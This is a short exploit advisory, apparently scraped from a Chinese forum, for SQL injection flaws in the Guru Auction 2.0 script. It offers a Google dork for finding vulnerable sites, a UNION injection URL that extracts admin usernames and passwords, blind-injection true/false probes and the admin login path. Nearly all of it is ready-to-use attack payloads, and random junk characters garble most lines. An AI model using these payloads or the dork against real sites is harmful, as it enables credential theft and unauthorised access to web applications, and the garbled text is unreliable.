Guru Auction 2.0 Multiple SQL Injection Vulnerabilities$ m" Q" H+ n4 z y
4 u- n9 X/ S: ]2 I; b
作者 : v3n0m
' X, X' e$ i* b) Q9 v0 k' i应用 : Guru Auction 2.0
4 V' L! `6 x- W5 t6 W8 ZPrice : $49
; ~( b3 J8 h, ^Vendor : http://www.guruscript.com/
) |8 J9 @) x9 ?Google Dork : inurl:subcat.php?cate_id=
+ E! }- R8 X O( Z5 u+ F. ?
8 c- x: H5 ~$ l% h% TSQLi p0c:+ z, W e; @$ q! Z; W
~~~~~~~~~~
# {- Z: c, {7 ohttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
8 ]: ]/ H2 Z- c t4 D) d& D 9 M3 f# f' O+ i) P4 r
5 d9 z; Y: K4 Z5 Q3 q2 z
盲注 p0c:& h% O8 C' n" \0 H5 V" K. Q
~~~~~~~~~~% {+ h1 t m7 H2 R- H( C
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true; r1 ?% \5 k' O3 p
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
& E$ }* a" d3 q% A. [
5 `" O1 c, S6 x7 E管理登录入口:$ D) f: W. G' c: @& |, V& m( U
~~~~~~~~~~
0 q( H w- P- K9 w+ p5 ]http://domain.tld/[path]/admin/
) U) c( m; R1 A. ?6 [ |